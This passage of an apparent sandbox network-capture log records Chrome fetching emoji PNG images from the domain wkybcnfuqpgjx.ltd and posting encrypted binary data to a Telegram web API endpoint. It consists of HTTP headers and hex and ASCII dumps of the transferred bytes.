                                  2025-01-12 00:03:59 UTC1369INData Raw: 6c 38 55 a9 2c 04 16 4a bd 8e a2 97 9c 56 87 77 82 46 0f 20 07 f7 78 5c a2 d0 a8 a7 49 0f 85 78 83 a0 17 8e ee c0 f4 31 c0 a3 2f b4 47 70 80 79 ab bd bb bb db eb b6 ab 5d bd a3 96 73 b5 04 41 d3 f1 a2 ac 09 c3 01 34 f7 3c 1c c3 68 53 77 00 0c 98 c0 e8 d1 2b 01 4f 4c e0 f6 c1 95 80 11 01 37 4a 3f 89 cd 47 0b 0b 4d 71 e9 7c a6 ad 1b 6a c2 5a d0 35 ad 16 6f c9 83 8e 40 2e 9f cd 27 28 fa c0 e7 35 7d d3 91 57 6f 7d a0 8e bc 0b f0 c1 eb 0e d1 2f 47 fd 4c d8 bf bc d1 6e cf 38 dc 0e 77 b1 50 ce 63 c9 56 23 6b 8d 43 60 02 d1 be a1 41 a8 57 f1 93 80 c3 7b 33 eb e8 de cc f6 8b 23 d7 52 46 f0 1a 22 1a 8d b8 36 7a bb 5d 9f 73 3a 70 ce eb 26 dc e7 27 28 12 c7 e2 12 a8 9b 40 10 27 6b b2 dc 88 91 9e 57 80 b3 d1 97 6e 1e 1d 73 b1 e7 8d 81 bf bb 8f 80 77 5e 03 f4 b5 77 7b
                                  Data Ascii: l8U,JVwF x\Ix1/Gpy]sA4<hSw+OL7J?GMq|jZ5o@.'(5}Wo}/GLn8wPcV#kC`AW{3#RF"6z]s:p&'(@'kWnsw^w{
                                  2025-01-12 00:03:59 UTC162INData Raw: f0 19 87 9f 25 2c 7c 97 94 2c fc 26 1d 8f 6a a2 5f 88 60 9c 16 85 ae 6d e9 ea fd c7 36 fd 70 e7 2a 1c 19 43 79 c3 9c 6d b1 0e 15 46 a3 ca 4e c9 d4 b0 a1 8f 95 62 d0 55 a2 a0 8c c9 49 f5 fe 29 f2 5d 9b 7f a5 8f e7 13 af 52 3a 4b 21 c0 7c cf 99 b5 cc 82 a6 e4 ff b4 53 07 19 00 c3 50 14 45 5b 4a 55 e9 a0 4a 08 a5 f1 f9 fb 5f 62 43 16 91 c9 b9 ce 02 de e8 2d 53 5b f7 73 dc 7c cb cc 88 d6 fb 6a df 35 ce 03 00 00 00 00 e6 f7 03 f5 b8 7f c8 aa 25 6a 0d 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: %,|,&j_`m6p*CymFNbUI)]R:K!|SPE[JUJ_bC-S[s|j5%jIENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  81192.168.2.649971172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:59 UTC608OUTGET /img-apple-160/1f1e9-1f1ff.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:59 UTC898INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:59 GMT
                                  Content-Type: image/png
                                  Content-Length: 4810
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:41 GMT
                                  ETag: "674840b1-12ca"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DAj4dj%2FhsXPDXgBu5RhZX0Wkd2ZIJ9J%2BJPypIrJrOI3u2tTaqkrSFWB%2ByF20j3KigiEGRmqKWU5xg3cRFFCrxA8UfybOSNgSbXC8s93M8ltXqNByR5LIIYCXZMgwQw1ZOWTE0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2f6baa0431a-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=2080&min_rtt=1612&rtt_var=939&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1186&delivery_rate=1811414&cwnd=224&unsent_bytes=0&cid=051db950c9f667a2&ts=605&x=0"
                                  2025-01-12 00:03:59 UTC471INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 82 8b 85 90 a8 9a 0c 46 24 6c 89 78 c4 c4 c4 51 6a 5a 75 84 7b 0c 47 25 73 8d 7e c8 c8 c8 6b 9f 81 0b 46 23 7d 7c 7d c4 c4 c4 66 9b 7c a9 a9 a9 67 74 6d 0a 45 22 8e 8e 8e c6 c6 c6 57 8c 6d 7f 87 82 04 4f 22 01 4a 20 76 76 76 c2 c5 c3 65 9a 7b 08 45 21 68 73 6c 67 9b 7d c8 c8 c8 83 83 83 0d 47 25 62 96 78 d1 d0 d0 69 9d 7f 09 44 21 71 71 71 84 84 84 c1 c1 c1 63 97 79 0c 47 24 ce ce ce 69 9d 7e 84 84 84 75 75 75 cf cf cf c0 c0 c0 05 40 1e 59 8d 6e cc c6 c9 35 75 50 ff ff ff fe ff ff ff fe ff fd fe fe fd fc fc fc fb fb fb fa fa fa f9 f9 f8 f8 f8 fe f4 f5 f7 f7 f7 f6 f6 f6 f5 f5 f5 f4 f4 f4 f4 f3 f3 f2 f2 f2 fd ec ec f1 f1 f1 ef
                                  Data Ascii: PNGIHDRPLTEGpLF$lxQjZu{G%s~kF#}|}f|gtmE"WmO"J vvve{E!hslg}G%bxiD!qqqcyG$i~uuu@Yn5uP
                                  2025-01-12 00:03:59 UTC1369INData Raw: 4e 4e 49 99 6a 7b 7b 7b 4f 92 6b 56 8d 6d 3d 98 63 74 74 74 f0 3e 3e 41 8f 62 4d 88 66 32 96 5b 07 a7 5b 25 98 56 32 90 59 1a 9c 56 24 97 55 25 95 54 25 94 53 3b 87 5a 09 a1 57 23 93 52 22 92 51 f0 2f 2f 42 80 4e 2b 8a 52 20 90 4e 59 74 48 23 8e 4f 0a 9a 51 75 66 3e 1e 8f 4d 82 5f 3c 13 94 4e 97 54 38 1d 8e 4c 2e 83 4f 1b 8d 4b 1f 8a 4b f1 26 26 1b 8c 4a ee 26 26 19 8b 49 c5 39 2c b4 41 2f 66 66 3c 19 8a 48 ee 24 24 9e 4a 32 d7 2e 27 1d 86 49 f6 1f 22 17 89 47 ee 22 22 fe 1a 20 17 88 46 1f 83 49 ec 21 21 16 87 45 e3 24 21 14 86 44 ea 1f 1f 14 85 43 ff 14 1d 20 7d 47 13 84 42 ef 1b 1b 19 80 43 f6 17 1b 7c 51 2c 05 89 3d 11 82 40 11 81 40 10 80 3f ff 0e 17 0f 80 3e 06 85 3b d8 20 1a 0e 7f 3d ee 14 14 0d 7e 3d 16 79 3f 0d 7d 3b 1e 71 41 0b 7c 3a 0b 7b 39 09
                                  Data Ascii: NNIj{{{OkVm=cttt>>AbMf2[[%V2YV$U%T%S;ZW#R"Q//BN+R NYtH#OQuf>M_<NT8L.OKK&&J&&I9,A/ff<H$$J2.'I"G"" FI!!E$!DC }GBC|Q,=@@?>; =~=y?};qA|:{9
                                  2025-01-12 00:03:59 UTC1369INData Raw: 47 12 4c 01 87 c2 73 71 ef 2f ec 2e 60 9f 80 02 9e 2c 28 86 29 b8 53 17 50 c8 14 26 b4 0d 7d 79 30 99 1b 00 01 61 7c 95 65 1b 6c 2a 90 c3 bb 47 0c 76 17 d0 20 0f 33 10 84 90 15 d2 86 62 65 80 3b 9e 3b ab af c8 fa 9e a6 e6 aa ce 40 74 00 17 76 26 16 70 64 0a 7f 37 65 3b 57 64 bc 70 07 68 70 af 6b b2 b1 23 77 da a6 7d fd f8 e3 cf bf 78 76 f2 d9 c9 c9 c9 a7 1f 3e e1 6f 62 cd 2e 34 8e aa 8d e3 ff e7 cc ec 4c 76 33 bb 49 cd 07 d9 a4 41 30 d0 d7 f8 be 50 7c f1 cd 5b 8d 20 56 44 c5 52 51 04 2b a2 a0 a8 18 2a f4 ca e8 85 82 17 5e 68 d1 0b a9 5e 59 ea 85 28 16 14 45 23 b6 5a f5 42 5a b5 0a b5 de 18 2b f1 a3 9b 34 b5 89 66 37 9b 66 76 e7 e3 1c bb bb 99 39 99 cc ce 4e ec 36 c9 0f 42 ce 09 99 ec 6f 9f 67 9e e7 9c 9c 59 c7 85 a4 da 47 04 78 75 df 12 b8 70 e9 0e e4 b2
                                  Data Ascii: GLsq/.`,()SP&}y0a|el*Gv 3be;;@tv&pd7e;Wdphpk#w}xv>ob.4Lv3IA0P|[ VDRQ+*^h^Y(E#ZBZ+4f7fv9N6BogYGxup
                                  2025-01-12 00:03:59 UTC1369INData Raw: 93 7e 56 59 d5 59 0c 81 5d 2a 41 9e 34 0b ba 6f 5b ce 74 95 38 a2 b8 ad ff 2b b0 9a 00 23 a2 40 06 c5 9a 55 b1 5a 2e 68 f0 59 e8 6c 73 a1 a0 2e 3b f6 7c 5d 52 41 15 b9 d0 8b 7b b2 74 e9 57 12 6e b6 9f 97 87 7e 8e 62 a0 20 14 48 6a 63 17 5d 37 3f b0 f7 47 25 b2 7c 89 21 08 ad 4e 90 04 e2 48 cf a9 19 f8 14 db 0c 14 5a ca d2 ad 02 17 18 be 65 68 ff e7 44 51 7e f2 61 3c 89 a6 52 4c 08 c1 4b 73 ad f0 d1 8a 4a 5f 37 17 3f cb b3 40 ee ba 62 f0 ee d1 a1 83 1f 85 72 2f 23 47 cb 5d 03 49 6f 3a c5 b0 93 ce 74 86 43 1a a6 3a db e6 ae f9 42 56 77 f2 3f bd f7 26 f5 43 63 66 d8 8f f9 62 32 65 24 c8 f3 5c 6d 04 a9 f1 6f b8 25 a7 35 21 df a3 b6 58 48 5c 5e ea 1b 1e ec 6a 4f b6 77 0d 0c ef d8 f5 f4 c8 19 7c ff ee 8c 42 a0 0b 30 aa 00 f2 ed a4 26 81 e2 aa 38 de 59 0b ff d7
                                  Data Ascii: ~VYY]*A4o[t8+#@UZ.hYls.;|]RA{tWn~b Hjc]7?G%|!NHZehDQ~a<RLKsJ_7?@br/#G]Io:tC:BVw?&Ccfb2e$\mo%5!XH\^jOw|B0&8Y
                                  2025-01-12 00:03:59 UTC232INData Raw: 02 ea 71 4c 8a 0c d9 0c cd 58 40 fb c5 77 9f fb fd 76 e7 bd e1 ce ac cf 2f 9f 9f 10 7c 90 6b 83 23 46 49 68 fa c5 b6 76 84 44 f7 77 07 56 14 35 29 32 0f fb dd cb b0 0b f8 ef 90 dd 16 c4 66 73 fe 6d 71 c4 20 09 42 20 23 78 87 81 30 2a b6 be 41 42 60 e3 7b c4 c3 dd ce 6f fb 88 ff 1d c2 75 ba 8b f3 cd 57 d9 11 88 6c 65 9f 74 28 09 4a d9 79 2b 28 c4 f7 c2 f6 65 d8 1b ee 07 c2 0d da cd 1b eb 55 92 84 65 81 a4 94 ac c8 c8 08 05 7b 1f bb 7e eb bd c7 7d 42 a7 db 5c 7b b6 6e 9e 66 33 18 32 c5 f6 83 7d 1f fa 2d 7c e8 23 ee 1f c2 14 b4 72 2d 5a 87 c6 35 e8 91 08 7d f0 3e a8 c7 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 c2 ab c0 3f 8c 7a 2d 57 51 8d e8 7b 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: qLX@wv/|k#FIhvDwV5)2fsmq B #x0*AB`{ouWlet(Jy+(eUe{~}B\{nf32}-|#r-Z5}>?z-WQ{IENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  82192.168.2.649968149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:59 UTC449OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 88
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:59 UTC88OUTData Raw: 2a 10 06 78 25 cb 00 4d 61 b3 f0 2b f9 c3 8c 49 9e e7 bb 8d d0 b3 a9 0b d0 f9 4f 47 92 5c 9c 06 aa 0f 81 1a b2 09 51 8f 24 e9 9b b1 a8 a4 0d d6 82 b0 84 9d 86 66 ee 97 a2 72 f3 6e cb 58 1b 65 66 90 0c a2 59 25 63 c4 d7 4b d3 a1 3e d5 58 b6 3e 9f 85 6a 78 99 eb c6
                                  Data Ascii: *x%Ma+IOG\Q$frnXefY%cK>X>jx
                                  2025-01-12 00:03:59 UTC408INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:59 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 536
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:59 UTC536INData Raw: 2a 10 06 78 25 cb 00 4d b1 61 7f aa dc b7 d8 bd 15 51 06 f4 4d dc 76 e1 f4 62 d2 03 9a f0 53 d8 5d 3a ad b6 1c 5f 37 a1 02 49 c4 27 d1 81 f9 4e 85 82 ba 31 5e ab 93 19 c2 7a 7f 55 a7 7b 90 78 bc 2a 62 91 08 14 fc 85 6b ba 86 bf c1 3b bf 58 6e 5d c7 ac dc 2e ed 57 0e 51 68 2d d6 a7 7f 28 11 71 7e 58 3f 71 d0 ea dc 95 69 d8 85 9d 22 80 17 45 fb 71 ea a6 6f 4e a8 07 6e bf 15 a6 40 fc 87 68 56 3c eb 1f fb a6 7f e0 94 4b 82 ae 96 09 ce d0 a1 05 09 c7 6a a6 ea 62 66 a4 b0 2e 53 a6 7d ef d8 79 95 14 55 ad 3a 24 71 b8 a7 1f 11 d7 83 6b e5 78 4d 51 2c 87 74 86 94 41 94 c6 ca c1 83 88 6a f8 36 e3 37 a1 69 3e 4a d5 30 48 af 0b 39 0b 64 fd 20 3b a4 27 80 b9 00 c5 29 d4 4e 6a ae d6 5b a4 a9 dc 70 78 a1 aa fd 6a 13 ff 34 95 99 9f 37 c0 28 9f 55 d8 f9 a2 4a d6 6d bb 9b
                                  Data Ascii: *x%MaQMvbS]:_7I'N1^zU{x*bk;Xn].WQh-(q~X?qi"EqoNn@hV<Kjbf.S}yU:$qkxMQ,tAj67i>J0H9d ;')Nj[pxj47(UJm


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  83192.168.2.649976172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:59 UTC608OUTGET /img-apple-160/1f1e6-1f1f8.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:59 UTC898INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:59 GMT
                                  Content-Type: image/png
                                  Content-Length: 5565
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-15bd"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Fal1y36P1qCYTL%2B4IjXNmccD8ZSz6FxtD96chGNScIQRXZbXEPUKmAKOlU6miZVodYEf72Ta76jEpIxdgtt3yQSSf0lHHEI%2FEqHZpzChDLyprKYGboz5%2FWt24Vv4XLPGn8nQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2f78a9cc3ff-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1499&min_rtt=1486&rtt_var=583&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1186&delivery_rate=1835323&cwnd=246&unsent_bytes=0&cid=96f3bf645714178e&ts=653&x=0"
                                  2025-01-12 00:03:59 UTC471INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 14 11 38 69 6c 8f 56 53 76 0c 0e 37 67 6a 8e 0d 10 38 63 65 89 10 12 3b 6d 6d 8e 0e 11 39 a8 a8 a8 7e 25 2f 5f 62 86 0b 0e 37 02 06 39 3d 30 58 67 6a 8e 0d 0e 37 10 12 3b 0a 0d 35 61 63 87 0e 11 3a 6a 6d 90 52 4f 73 15 12 39 61 63 87 0d 0f 38 09 0b 34 6a 6c 90 3a 3d 67 61 63 87 0f 12 3b 6a 6d 90 04 06 30 ff ff ff fe ff ff fe fe ff fd fe fe fa ff ff fc fc fd fb fc fc fa fb fb f9 f9 f9 f7 f7 f7 f4 f5 f5 f3 f3 f3 f1 f1 f1 ee f0 f0 ed ee ee f5 e8 ea ea eb ec e8 e8 e8 e5 e8 e9 f3 df e1 e5 e5 e6 e8 e0 e1 e2 e2 e2 df e0 e0 ef d6 d8 dd de de dc dc dd da db db d9 d9 d9 d8 d8 d8 ea cd d0 d6 d6 d6 d4 d4 d4 d2 d2 d2 ce ce ce e6 c2 c6 cb
                                  Data Ascii: PNGIHDRPLTEGpL8ilVSv7gj8ce;mm9~%/_b79=0Xgj7;5ac:jmROs9ac84jl:=gac;jm0
                                  2025-01-12 00:03:59 UTC1369INData Raw: 2a 39 6e 56 1a 4f 52 7c 97 42 10 4d 50 85 73 4b 35 91 33 56 b5 26 35 8b 41 16 aa 29 39 a1 2c 3f 4a 4d 79 92 3d 0c b2 22 31 46 49 83 7f 30 5a 8b 2c 4a ad 1f 2e 8b 37 06 42 45 78 a1 22 33 83 38 0d 6d 3d 1f 3e 42 80 6d 30 60 a9 1b 2a 86 32 02 87 26 3c 3d 41 73 a7 16 25 a2 18 26 76 33 0c 56 30 68 98 1a 2a 37 3b 7e 7b 2e 02 35 39 74 6c 24 4f 9e 13 22 6d 2f 0a 72 2b 03 30 34 7b 8a 16 26 59 31 1b 4e 28 64 98 0f 1e 7e 18 33 31 34 6b 3c 2b 70 2d 31 74 69 28 02 55 21 56 62 28 06 2a 2e 78 27 2c 7a 27 2c 79 27 2c 78 29 2c 6f 63 24 00 70 16 23 25 2a 78 25 2a 76 20 2b 7b 59 23 04 5f 15 3c 23 28 76 22 27 72 23 27 6b 42 1b 55 20 25 73 22 25 65 1f 24 71 5d 15 17 1d 22 70 1c 21 6d 1f 21 5f 4c 1c 02 1a 1f 6c 1b 1f 66 18 1d 6b 1b 1e 59 16 1b 69 16 1b 61 34 10 48 19 1c 51 23
                                  Data Ascii: *9nVOR|BMPsK53V&5A)9,?JMy="1FI0Z,J.7BEx"38m=>Bm0`*2&<=As%&v3V0h*7;~{.59tl$O"m/r+04{&Y1N(d~314k<+p-1ti(U!Vb(*.x',z',y',x),oc$p#%*x%*v +{Y#_<#(v"'r#'kBU %s"%e$q]"p!m!_LlfkYia4HQ#
                                  2025-01-12 00:03:59 UTC1369INData Raw: 31 30 cb 34 14 3b 07 08 9d 42 4b 64 21 20 81 9c 09 04 a5 00 45 b8 e4 10 3f 61 90 a7 81 1a e3 d8 48 ea 7b 6d a2 1d 80 db 56 63 63 b3 9b 70 4a 09 46 c0 8c 11 e8 6c f0 55 2b 57 fb e4 5c 20 34 14 32 68 69 be 26 80 34 82 f1 5f 4c 34 00 28 aa 80 14 2c 83 1e 03 c7 b6 49 5e af be df 07 05 9c 01 ef 9d fa 5a 9f 32 0e 8a 1c 08 02 c8 32 42 c7 ad 48 cf ad 55 17 97 bf f7 44 58 e7 00 35 00 43 84 86 96 50 18 be 44 62 0e 8f 9e 0c 4b e5 8f 09 60 0a 93 d3 bc f5 fd 08 dc f8 e4 f6 56 dd 67 0c 84 c1 08 41 15 ac da 2b cd 70 e5 a1 5b 39 70 5d a0 f6 e7 af db dc 3e 1f a8 50 b0 b4 2c 76 0b a5 82 9a 06 d4 48 cf e4 51 0a 8a 8a b7 bf d1 08 39 a3 18 01 d5 c2 dd cd f2 9d 95 8f dd 49 3a 22 5d ae b5 81 c8 27 5f 7f d3 b9 00 50 01 43 c3 45 80 1a 67 00 35 9c 21 0f a0 ac bc df 59 6d 6a 46 09
                                  Data Ascii: 104;BKd! E?aH{mVccpJFlU+W\ 42hi&4_L4(,I^Z22BHUDX5CPDbK`VgA+p[9p]>P,vHQ9I:"]'_PCEg5!YmjF
                                  2025-01-12 00:03:59 UTC1369INData Raw: 84 75 07 0b de 16 b9 e7 f6 3a 92 52 00 4b 9f 7f b1 b3 74 f7 47 0e 1e 44 d8 79 fa 5f 7b 24 23 76 b5 d4 5b 08 9a ee a5 81 5e fd 49 00 13 1b 6b 1b db 5d 70 40 5f 0c 98 bd c8 df a2 b2 74 5f ee 69 4a 28 01 90 3d f7 ab 35 5d ed 84 70 17 11 ff dd 7f 4a 0a 25 33 b6 e4 b4 a4 7d 29 20 b2 77 eb 6d d3 41 60 23 5e df da f2 29 03 f4 05 81 ea f6 a3 68 57 d8 0b 07 75 46 08 72 20 83 fa cc 2b 2b f5 c8 81 bb 1c 55 5f 7b 73 95 42 29 9d 65 60 c2 ba 04 30 e9 34 f7 fa b0 86 43 dc 9d f5 8d dd 88 13 e0 e2 40 fd 91 ec e6 52 67 69 6d 53 e0 18 28 5f fe 4d ba 37 04 06 fa 1b ef 70 03 d4 20 b3 01 21 a1 72 5d 9c 58 48 72 1d d6 9b ab 2d 49 09 f4 2c 40 f2 a2 5a 41 bf b9 c7 e8 18 88 4f 7f 01 4d 38 58 58 4e 57 bf de 62 98 1d 98 13 bc 8e 6c ef c5 18 85 cb c1 f0 59 57 33 68 cc 06 54 f7 3e b2
                                  Data Ascii: u:RKtGDy_{$#v[^Ik]p@_t_iJ(=5]pJ%3}) wmA`#^)hWuFr ++U_{sB)e`04C@RgimS(_M7p !r]XHr-I,@ZAOM8XXNWblYW3hT>
                                  2025-01-12 00:03:59 UTC987INData Raw: 98 e2 28 42 01 3d e5 a4 d4 01 97 5e e8 0d 94 61 9a 81 71 03 cc 79 45 85 89 86 be 2e 60 0a f3 3d c7 fc 30 a3 73 68 ee c4 04 94 9a 67 87 db 40 d8 48 fc 5d df 03 15 c8 81 a6 53 1b 86 c6 80 a7 b3 1c 68 db 33 03 91 9d 0d 1c cf 76 6a a2 09 60 a4 d0 e9 11 c6 95 e7 a0 e6 f8 80 68 71 60 f7 60 bf dd 53 bc 18 08 19 2a 74 0e d4 8a 9a 85 3d 57 9d c8 39 7b 42 bb 88 f1 60 d8 a0 ed 38 94 60 b0 41 29 6c c0 42 85 e3 f0 e9 41 bb 1f 31 71 62 ed 96 56 05 f0 8a 73 75 17 02 0e 0b 67 9c ba 7f 14 45 89 a7 c0 87 40 0e 38 dc ed bf d5 d8 f1 15 63 05 70 20 1c 00 98 b8 7e 20 c1 c9 08 50 c6 91 b5 f3 6b a7 56 30 55 1e ae c0 dc 7f 7d bf 1d 32 3e 65 79 de 75 cc b8 4f b1 15 40 c2 c1 41 29 08 0f 3a bd 20 8e c1 73 20 e0 d8 f1 0f d7 f7 83 8c 17 ff 08 af 11 28 52 98 4c 07 16 6b 58 73 a5 a5 3a
                                  Data Ascii: (B=^aqyE.`=0shg@H]Sh3vj`hq``S*t=W9{B`8`A)lBA1qbVsugE@8cp ~ PkV0U}2>eyuO@A): s (RLkXs:


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  84192.168.2.649977172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:59 UTC608OUTGET /img-apple-160/1f1e6-1f1e9.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:59 UTC902INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:59 GMT
                                  Content-Type: image/png
                                  Content-Length: 4963
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-1363"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zA0FxTNOZpJuEW3kMwgpiTbeeVHWi%2F%2BQASX2yLR4VyVsuUAdDDeW2uGj9b0FyKGvLWfxY86yQfIqds%2B0y94NuuxvJ%2FO0bty3%2BljBWDXHCCxFVQr8IH5eMBv5j4kpzJu0Km1ShQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2f79c6442c9-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1709&rtt_var=659&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1186&delivery_rate=1638608&cwnd=127&unsent_bytes=0&cid=c21734ae8d3efbd0&ts=633&x=0"
                                  2025-01-12 00:03:59 UTC467INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 81 5e 45 cb c1 6d 7f 5d 54 66 17 24 89 6f 54 42 19 31 cf c1 6c a0 70 7f 82 72 13 53 16 28 83 77 12 bb 68 6f 6b 6e 8e 9b 27 2f cf c2 6c 17 1b 3f bd 6c 72 82 75 12 71 16 1c 1a 1e 4a ce c1 6c 74 78 96 cf c3 6c bc 6e 73 6d 12 19 4e 53 77 81 74 13 1a 1e 41 ce c2 6e 73 77 95 cf c3 6c 19 1d 42 73 76 96 77 1a 20 bd 6c 72 19 1d 41 83 76 13 cd c2 6b 6f 14 1a 73 76 95 ce c3 6c 73 17 1e 49 4d 74 fe f4 df fe f8 9a ff ff 2c f9 d5 d4 fc f6 1b ff f2 1c ff ee 1c f6 f1 1c ff ef 0a ff ea 1b ff ec 0a ff e7 21 f5 e7 2f fe e4 24 ff e5 13 fc e2 25 eb e7 34 fc e2 16 fa e0 25 e6 d1 a0 fa df 22 f9 df 24 f8 de 24 f6 de 28 f5 dd 2f fa de 19 f8 dd 23 f6
                                  Data Ascii: PNGIHDRPLTEGpL^Em]Tf$oTB1lprS(whokn'/l?lruqJltxlnsmNSwtAnswlBsvw lrAvkosvlsIMt,!/$%4%"$$(/#
